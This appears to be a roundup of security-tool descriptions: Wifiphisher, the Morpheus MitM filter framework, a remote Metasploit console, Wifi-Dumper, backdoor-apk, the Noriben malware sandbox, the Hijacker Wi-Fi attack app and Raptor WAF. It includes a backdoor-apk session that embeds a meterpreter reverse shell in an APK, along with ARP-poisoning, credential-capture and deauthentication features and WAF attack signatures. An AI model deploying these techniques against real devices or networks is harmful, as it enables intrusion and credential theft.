Targeting an access point


A successful attack



Disclaimer
  • Authors do not own the logos under the wifiphisher/data/ directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research.
  • Usage of Wifiphisher for attacking infrastructures without prior mutual consent can be considered an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

Morpheus - Automated Ettercap TCP/IP Hijacking Tool


The Morpheus framework automates TCP/UDP packet manipulation tasks by using Ettercap (etter) filters to manipulate target requests/responses under MitM attacks, replacing the TCP/UDP packet contents with our own contents before forwarding the packet back to the target host.

workflow:
1º - attacker -> arp poison local lan (mitm)
2º - target   -> requests webpage from network (wan)
3º - attacker -> modifies webpage response (contents)
4º - attacker -> modified packet is forwarded back to target host

morpheus ships with some pre-configured filters but allows users to improve them when launching the attack (morpheus scripting console). At the end of the attack morpheus will revert the filter back to its default state; this allows users to improve filters at run time without fear of messing up the filter command syntax and spoiling the filter.

"Perfect for scripting fans to safely test new concepts"...

What can we accomplish by using filters?

morpheus ships with a collection of etter filters written by me to accomplish various tasks: replacing images in webpages, replacing text in webpages, injecting payloads using the HTML <form> tag, denial-of-service attacks (drop/kill packets from source), HTTPS/SSH downgrade attacks, redirecting target browser traffic to another domain; it also gives you the ability to build and compile your own filter from scratch and launch it through the morpheus framework (option W).

"filters can be extended using browser languages like: javascript, css, flash, etc"...
In this example we are using an HTML tag to inject a redirection URL into the target request (screenshot: morpheus v1.6-Alpha).
In this example we are using CSS3 to trigger a 180º webpage rotation (screenshot: morpheus v1.6-Alpha).
Framework limitations

1º - morpheus will fail if the target system is protected against ARP poisoning attacks
2º - downgrade attacks will fail if the target browser has an HTTPS-only add-on installed
3º - the target system sometimes needs to clear its net cache for ARP poisoning to be effective
4º - many attacks described in morpheus may be dropped by the target's HSTS detection system
5º - "incorrect number of token (///) in TARGET !!" (screenshot: morpheus v1.6-Alpha)
morpheus by default will run ettercap using IPv6 (USE_IPV6=ACTIVE), as previously
configured in the 'settings' file; if you are receiving this error, edit the settings
file before running morpheus and set (USE_IPV6=DISABLED) to force ettercap to use IPv4
6º - morpheus needs ettercap to be executed with high privileges (uid 0 | gid 0). (screenshot: morpheus v1.6-Alpha)
Correct ettercap configuration display (running as Admin without SSL dissectors active) (screenshot: morpheus v1.6-Alpha)
By default morpheus (at startup) will replace the original etter.conf/etter.dns files provided by ettercap; at framework exit morpheus will revert the files to their original state.

Dependencies
ettercap, nmap, apache2, zenity

Framework option 1 [firewall] screenshots
firewall [option 1] pre-configured filter will capture credentials from the following services:
http, ftp, ssh, telnet (facebook uses https/ssl :( ), report suspicious connections, report common
social-website browsing (facebook, twitter, youtube), report the existence of botnet connections like
Mocbot IRC Bot, Darkcomet, redirect browser traffic and allow users to block connections (drop, kill)
"Remember: morpheus gives its users the ability to 'add more rules' to filters before execution"

[morpheus] host:192.168.1.67 [ -> ] port:23 telnet ☆
(source IP address, flow direction, destination port, rank: good)

[morpheus] host:192.168.1.67 [ <- ] port:23 telnet ☠
(destination IP, flow direction, source port, rank: suspicious)
Basically the firewall filter acts as both an offensive and a defensive tool, analyzing the
TCP/UDP data flow to report logins, suspicious traffic and brute-force attempts, block target IPs, etc.

MSF-Remote-Console - A Remote Msfconsole To Connect To The Msfrcpd Server Of Metasploit


A remote msfconsole written in Python 2.7 to connect to the msfrpcd server of Metasploit. This tool gives you the ability to load modules permanently as a daemon on your server, like autopwn2. Although it gives you the ability to use the msfrpcd server remotely, it is recommended to use it locally over an ssh or mosh shell because certificate validation is not enabled.

Features
  • Optimized delivery & execution of commands.
  • Has all msf commands implemented even future ones. This is possible through the structure of the rpc api.
  • Browse through your command history with the up and down arrow key.
  • Tab completion for system paths.
  • It feels like the normal msfconsole!

What does it look like?
[*] Connecting to server:
Host => myDomain.com,
Port => 55553,
User => msf,
Pwd => ***,
SSL => True

[+] Successfully connected
[*] Console id: 19
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||


=[ metasploit v4.12.22-dev-52b81f3 ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


msf >

How do I use it?
Usage: Main.py [options]
Options:
-h, --help show this help message and exit
-r RESOURCE, --resource=RESOURCE
Path to resource file
-u USERNAME, --user=USERNAME
Username specified on msfrpcd
-p PASSWORD, --pass=PASSWORD
Password specified on msfrpcd
-s, --ssl Enable ssl
-P PORT, --port=PORT Port to connect to
-H HOST, --host=HOST Server ip
-c, --credentials Use hardcoded credentials
-e, --exit Exit after executing resource script
With the -c option you can use the credentials hardcoded into Main.py; feel free to change them so that you don't have to pass the credential parameters every time.
With the -r option you specify a resource script to load from your computer into the console.

Example:
This will load a resource script and use the hardcoded credentials:
python Main.py -c -r /root/resource/handler/allHandlers.rc
This will log in to the msfrpcd server through command line arguments:
python Main.py --ssl --port 55553 --host 127.0.0.1 --user msf --pass msf

How do I install it?
First you must have Metasploit installed. If you can't use the installer because you have no graphical environment (or for any other reason), use this guide from Rapid7: Setting Up a Metasploit Development Environment. This will install all needed dependencies:
git clone https://github.com/allfro/pymetasploit.git pymetasploit
cd pymetasploit && sudo python setup.py install
Also don't forget to start your msfrpcd server:
cd metasploit-framework/
ruby msfrpcd -U msf -P msf -p 55553
It's also a good idea to start and connect to the PostgreSQL database (change the password in the echo line):
sudo update-rc.d postgresql enable
sudo service postgresql start
echo "create database msf;create user msf with password 'password';grant all privileges on database msf to msf;" > createdb_sql.txt
sudo -u postgres /usr/bin/psql < /home/postgres/createdb_sql.txt
In Metasploit:
db_connect msf:password@127.0.0.1/msf



Wifi-Dumper - Tool To Dump The Wifi Profiles And Cleartext Passwords Of The Connected Access Points On The Windows Machine


This is an open source tool to dump the wifi profiles and cleartext passwords of the connected access points on a Windows machine. This tool will help you in Wi-Fi testing. Furthermore, it is useful while performing red team or internal infrastructure engagements.

Features
  • Option 1: Shows the wireless networks available to the system. If interface name is given, only the networks on the given interface will be listed. Otherwise, all networks visible to the system will be listed. 
  • Option 2: Shows a list of wireless profiles configured on the system. 
  • Option 3: Shows the allowed and blocked wireless network list. 
  • Option 4: Shows a list of all the wireless LAN interfaces on the system. 
  • Option 5: Generates a detailed report about each wireless access point profile on the system. Group Policy Profiles are read only. User Profiles are readable and writeable, and the preference order can be changed. 
  • Option 6: Dumps the cleartext passwords of every wireless profile on the system. Make sure to generate the profile file (by selecting option 2) before running this option. Always run this as an administrator user to see the cleartext password. The user needs to provide the individual wireless name by reading the profile names (option 7).
  • Option 7: Opens the list of wireless profiles on the system using notepad.
  • Option 8: Saves WLAN profiles to XML files.
  • Option 9: Exit gracefully.

General Notes

[+] Each option in the tool generates a ".txt" file as output.
[+] If you run the tool multiple times, the output gets appended to the previous results.

How to run the application?

[+] Run cmd.exe as an administrator. 
[+] Change Directory 
[+] Run the application as C:\>python wifi_dumper.py

Questions?



backdoor-apk - shell script that simplifies the process of adding a backdoor to any Android APK file


backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

Usage:
root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie

[*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016
[+] Android payload options:
1) meterpreter/reverse_http 4) shell/reverse_http
2) meterpreter/reverse_https 5) shell/reverse_https
3) meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#
The recompiled APK will be found in the 'original/dist' directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script: msfconsole -r backdoor-apk.rc


Noriben - Portable, Simple, Malware Analysis Sandbox


Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.
Noriben not only lets you run malware as a sandbox would, but also logs system-wide events while you run the malware manually in whatever way is needed to make it execute. For example, it can listen as you run malware that requires varying command line options, or watch the system as you step through malware in a debugger.
Noriben only requires Sysinternals procmon.exe (or procmon64.exe) to operate. It requires no pre-filtering (though it would greatly help) as it contains numerous white list items to reduce unwanted noise from system activity.

Cool Features
If you have a folder of YARA signature files, you can specify it with the --yara option. Every newly created file will be scanned against these signatures, with the results displayed in the output.
If you have a VirusTotal API key, place it into a file named "virustotal.api" (or embed it directly in the script) to auto-submit MD5 file hashes to VT and get the number of positive results.
You can add lists of MD5s to auto-ignore (such as all of your system files). Generate them with md5deep, put them into a text file, and use --hash to read it.
You can automate the script for sandbox usage. Using -t to set the execution time and --cmd "path\exe" to specify a malware file, you can automatically run the malware, copy the results off, and then revert to run a new sample.
The --generalize feature will automatically substitute absolute paths with Windows environment paths for better IOC development. For example, C:\Users\malware_user\AppData\Roaming\malware.exe will be automatically resolved to %AppData%\malware.exe.
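The path generalization and MD5 whitelist features described above, as an added Python example (not Noriben's own code): the rule table, the rule ordering, the assumption that user names contain no whitespace, that only C: is the system drive, and that the whitelist file has md5deep's "hash  path" shape are all this example's assumptions; the report lines are constructed.

```python
import re
from typing import Iterable, List, Set, Tuple

# Generalization rules, applied in order: the most specific root first, so that a
# path under AppData\Roaming becomes %AppData% instead of %UserProfile%\AppData\Roaming.
# Constructed table for this example; the user-name component is assumed to contain
# no whitespace, and only C: is treated as the system drive (example assumptions).
GENERALIZATION_RULES: List[Tuple[str, str]] = [
    (r"\b[A-Za-z]:\\Users\\[^\\\s]+\\AppData\\Roaming\b", "%AppData%"),
    (r"\b[A-Za-z]:\\Users\\[^\\\s]+\\AppData\\Local\\Temp\b", "%Temp%"),
    (r"\b[A-Za-z]:\\Users\\[^\\\s]+\\AppData\\Local\b", "%LocalAppData%"),
    (r"\b[A-Za-z]:\\Users\\[^\\\s]+", "%UserProfile%"),
    (r"\b[A-Za-z]:\\ProgramData\b", "%ProgramData%"),
    (r"\b[A-Za-z]:\\Program Files \(x86\)", "%ProgramFiles(x86)%"),
    (r"\b[A-Za-z]:\\Program Files\b", "%ProgramFiles%"),
    (r"\b[A-Za-z]:\\Windows\b", "%WinDir%"),
    (r"\bC:\\", "%SystemDrive%\\"),
]
_COMPILED = [(re.compile(p, re.IGNORECASE), v) for p, v in GENERALIZATION_RULES]


def generalize_line(line: str) -> str:
    """Rewrite every drive-rooted Windows path in a report line to its
    environment-variable form; text without such paths is returned unchanged."""
    for pattern, variable in _COMPILED:
        # A callable replacement keeps the '%' and '\\' of the variable literal.
        line = pattern.sub(lambda _m, v=variable: v, line)
    return line


def generalize_report(lines: Iterable[str]) -> List[str]:
    """Generalize each line and drop lines that become identical afterwards, so the
    same indicator observed under two user names is reported once."""
    seen: Set[str] = set()
    result: List[str] = []
    for raw in lines:
        line = generalize_line(raw.rstrip("\n"))
        if line not in seen:
            seen.add(line)
            result.append(line)
    return result


def load_md5_whitelist(md5deep_output: Iterable[str]) -> Set[str]:
    """Parse md5deep-style lines ("<md5>  <path>") into a set of lowercase hashes;
    lines that do not start with a 32-hex-digit hash are skipped (example assumption
    about the whitelist file shape)."""
    hashes: Set[str] = set()
    for line in md5deep_output:
        parts = line.strip().split(None, 1)
        if parts and re.fullmatch(r"[0-9a-fA-F]{32}", parts[0]):
            hashes.add(parts[0].lower())
    return hashes


# Constructed, Noriben-style report lines from two runs under different user names.
SAMPLE_REPORT = [
    r"[CreateFile] C:\Users\malware_user\AppData\Roaming\malware.exe",
    r"[CreateFile] C:\Users\malware_user\AppData\Local\Temp\stage2.dll",
    r"[CreateProcess] C:\Windows\System32\cmd.exe",
    r"[CreateFile] C:\Users\analyst\AppData\Roaming\malware.exe",
    r"[RegSetValue] HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"
    r" = C:\Users\malware_user\AppData\Roaming\malware.exe",
]

if __name__ == "__main__":
    for entry in generalize_report(SAMPLE_REPORT):
        print(entry)
```

Note that the first and fourth sample lines collapse into one indicator once the user name is generalized away.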

Usage:
--===[ Noriben v1.6 ]===--
--===[ @bbaskin ]===--

usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [--hash HASH]
[-t TIMEOUT] [--output OUTPUT] [--yara YARA] [--generalize]
[--cmd CMD] [-d]

optional arguments:
-h, --help show this help message and exit
-c CSV, --csv CSV Re-analyze an existing Noriben CSV file
-p PML, --pml PML Re-analyze an existing Noriben PML file
-f FILTER, --filter FILTER
Specify alternate Procmon Filter PMC
--hash HASH Specify MD5 file whitelist
-t TIMEOUT, --timeout TIMEOUT
Number of seconds to collect activity
--output OUTPUT Folder to store output files
--yara YARA Folder containing YARA rules
--generalize Generalize file paths to their environment variables.
Default: True
--cmd CMD Command line to execute (in quotes)
-d Enable debug tracebacks


Hijacker - Aircrack, Airodump, Aireplay, MDK3 and Reaver GUI Application for Android



Hijacker is a Graphical User Interface for the wireless auditing tools airodump-ng, aireplay-ng and mdk3. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.
This application requires an Android device with a wireless adapter that supports Monitor Mode. A few Android devices do, but none of them natively; this means that you will need custom firmware. The Nexus 5 and any other device that uses the BCM4339 chipset (and the BCM4358, although injection is not yet supported there, so no aireplay or mdk) will work with Nexmon. Also, devices that use the BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable.
The required tools are included in the app. To install them go to Settings and click "Install Tools". This will install everything in the directory you select. If you have already installed them, you don't have to do anything. You can also keep them in any directory you want and set the directories in Settings, though this might cause the wireless tools not to be found by the aircrack-ng suite. The Nexmon driver and management utility are also included.
Root is also necessary, as these tools need root to work. If you don't grant root permissions to it, it hangs... for some reason... don't know why...

Features:
  • View a list of access points and stations (clients) around you (even hidden ones)
  • View the activity of a network (by measuring beacons and data packets) and its clients
  • Deauthenticate all the clients of a network
  • Deauthenticate a specific client from the network it's connected
  • MDK3 Beacon Flooding with custom SSID list
  • MDK3 Authentication DoS for a specific network or to everyone
  • Try to get a WPA handshake or gather IVs to crack a WEP network
  • Statistics about access points (only encryption for now)
  • See the manufacturer of a device (AP or station) from a OUI database (pulled from IEEE)
  • See the signal power of devices and filter the ones that are closer to you
  • Leave the app running in the background, optionally with a notification
  • Copy commands or MAC addresses to clipboard, so you can run them in a terminal if something goes wrong
  • Include the tools
  • Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)
  • .cap files cracking with custom wordlist
  • Save captured packets in .cap file
  • Create custom commands to be ran on an access point or a client with one click

Installation:
Make sure:
  • you are on Android 5+
  • you are rooted. SuperSU is required. If you are on CM, install SuperSU
  • have installed busybox (opened and installed the tools)
  • have a firmware to support Monitor Mode on your wireless interface

Download the latest version here .
When you run Hijacker for the first time, you will be asked whether you want to set up the tools or go to home screen. If you have installed your firmware and all the tools, you can just go to the home screen. Otherwise, click set up to install the tools. You can change the directories in which they will be installed, but I recommend that you leave them unchanged. The app will check what directories are available and select the best for you. Keep in mind that on some devices, installing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the tools and the firmware (only Nexmon) you will land on the home screen and airodump will start. If you don't see any networks, make sure you have enabled your WiFi and it's in monitor mode. If you have a problem, go to settings and click "Test Tools". If they all pass, you probably don't have monitor mode enabled. If something fails, click "Copy test command" and select the tool that fails. A sample command will be copied to your clipboard so you can open a terminal, run it, and see what's wrong.
Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, then you should be getting the results you want. But also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on a network. It's not the app's fault, it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development so bugs are to be expected.

Troubleshooting:
First of all, if the app happens to crash at a random time, run it again and close it properly. This is to make sure that there are not any tools still running in the background, as this can cause battery drain. If it crashes during startup or exiting, open a terminal, run ps | busybox grep -e air -e mdk and kill the processes you see.
Most of the problems arise from the binaries not being installed (correctly or at all). If that's the case, go to settings, click "install tools", choose directories for binaries and the lib (libfakeioctl.so) and click install. If the directory for your binaries is included in PATH, then you don't have to do anything else. If it's not, then you need to adjust the absolute paths of the binaries, right below the "install tools" option. This might also cause problems (especially with mdk) since these programs require the wireless tools to be installed, and they won't find them if you install them anywhere other than the paths included in your PATH variable. If you don't know what the PATH variable is, then you probably shouldn't be using any of these programs.
Installing the tools via the NexMon app doesn't work anymore, so if there is a problem, just reinstall them through the app in the same directory you have them already.
If you are certain that there is a problem with the app itself and not the tools installation, open an issue here so I can fix it. Make sure to include precise steps to reproduce the problem and a logcat (having the logcat messages option enabled in settings). If the app happens to crash, a new activity should start which will generate a report in /sdcard and give you the option to email it to me directly. I suggest you do that, and if you are worried about what will be sent you can check it out yourself; it's just a txt file and it will be sent as an email attachment to me.


Raptor WAF v0.04 - Web Application Firewall using DFA


Raptor WAF is a simple web application firewall written in C following the KISS principle. For polling it uses the select() function, which is not better than epoll() or kqueue() from *BSD but is portable; the core of the match engine uses a DFA to detect XSS, SQLi and path traversal.

No more words, look at the following:


WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and XSS...
  • You can block XSS, SQL injection attacks and path traversal with Raptor
  • You can use blacklist of IPs to block some users at config/blacklist ip.txt
  • You can use IPv6 and IPv4 at communications
  • In the future: DoS protector, request limit, rule interpreter and malware detector for uploads.
  • In the future: SSL/TLS...
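Raptor's match engine is written in C; the following added Python example (not the project's own code) shows the DFA idea behind it: an Aho-Corasick automaton built from a signature list so a percent-decoded request target is scanned in a single pass and classified as XSS, SQLi or path traversal. The signature strings, the two-round decoding bound and the function names are this example's assumptions, not Raptor's rule set.

```python
from collections import deque
from typing import Dict, List, Set, Tuple
from urllib.parse import unquote

# Constructed signature table for this example (not Raptor's rule set); matching is
# case-insensitive because input and patterns are lowercased before the scan.
SIGNATURES: Dict[str, List[str]] = {
    "xss": ["<script", "javascript:", "onerror=", "onload="],
    "sqli": ["union select", "' or '", "or 1=1", "sleep("],
    "traversal": ["../", "..\\"],
}


class DFAMatcher:
    """Aho-Corasick automaton: a DFA over all signatures at once, so each request
    byte is examined once regardless of how many patterns are loaded."""

    def __init__(self, signatures: Dict[str, List[str]]) -> None:
        self.goto: List[Dict[str, int]] = [{}]          # transitions per state
        self.out: List[Set[Tuple[str, str]]] = [set()]  # (category, pattern) hits
        self.fail: List[int] = [0]                      # failure links
        for category, patterns in signatures.items():
            for pattern in patterns:
                self._add(pattern.lower(), (category, pattern))
        self._link_failures()

    def _add(self, pattern: str, label: Tuple[str, str]) -> None:
        state = 0
        for ch in pattern:
            if ch not in self.goto[state]:
                self.goto.append({})
                self.out.append(set())
                self.fail.append(0)
                self.goto[state][ch] = len(self.goto) - 1
            state = self.goto[state][ch]
        self.out[state].add(label)

    def _link_failures(self) -> None:
        # Breadth-first so every state's failure target is already linked.
        queue = deque(self.goto[0].values())
        while queue:
            r = queue.popleft()
            for ch, s in self.goto[r].items():
                queue.append(s)
                f = self.fail[r]
                while f and ch not in self.goto[f]:
                    f = self.fail[f]
                self.fail[s] = self.goto[f].get(ch, 0)
                self.out[s] |= self.out[self.fail[s]]   # inherit shorter-suffix hits

    def scan(self, text: str) -> Set[Tuple[str, str]]:
        state, hits = 0, set()
        for ch in text:
            while state and ch not in self.goto[state]:
                state = self.fail[state]
            state = self.goto[state].get(ch, 0)
            hits |= self.out[state]
        return hits


def normalize(target: str, max_rounds: int = 2) -> str:
    """Percent-decode until stable, bounded to max_rounds so double-encoded input
    such as %252e%252e/ reaches the automaton as ../ while the per-request cost
    stays fixed; then lowercase."""
    text = target
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text.lower()


MATCHER = DFAMatcher(SIGNATURES)


def classify_request(target: str) -> Set[str]:
    """Return the attack categories whose signatures occur in a request target
    (path plus query string); an empty set means the request passes."""
    return {category for category, _pattern in MATCHER.scan(normalize(target))}


if __name__ == "__main__":
    for sample in ("/test.php?q=hello", "/test.php?file=%252e%252e/%252e%252e/etc/passwd"):
        print(sample, "->", sorted(classify_request(sample)) or "clean")
```

The decoder only sees what the normalizer hands it: a signature that depends on an encoding the normalizer does not undo (for example "+" for space, which unquote leaves alone) will not match, which is the usual WAF caveat.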


to run:

$ git clone https://github.com/CoolerVoid/raptor_waf
$ cd raptor_waf; make; bin/raptor

Example

Bring up an HTTP server on port 80, then run:
$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt
You can then test at http://localhost:8883/test.php

See the docs:

https://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdf

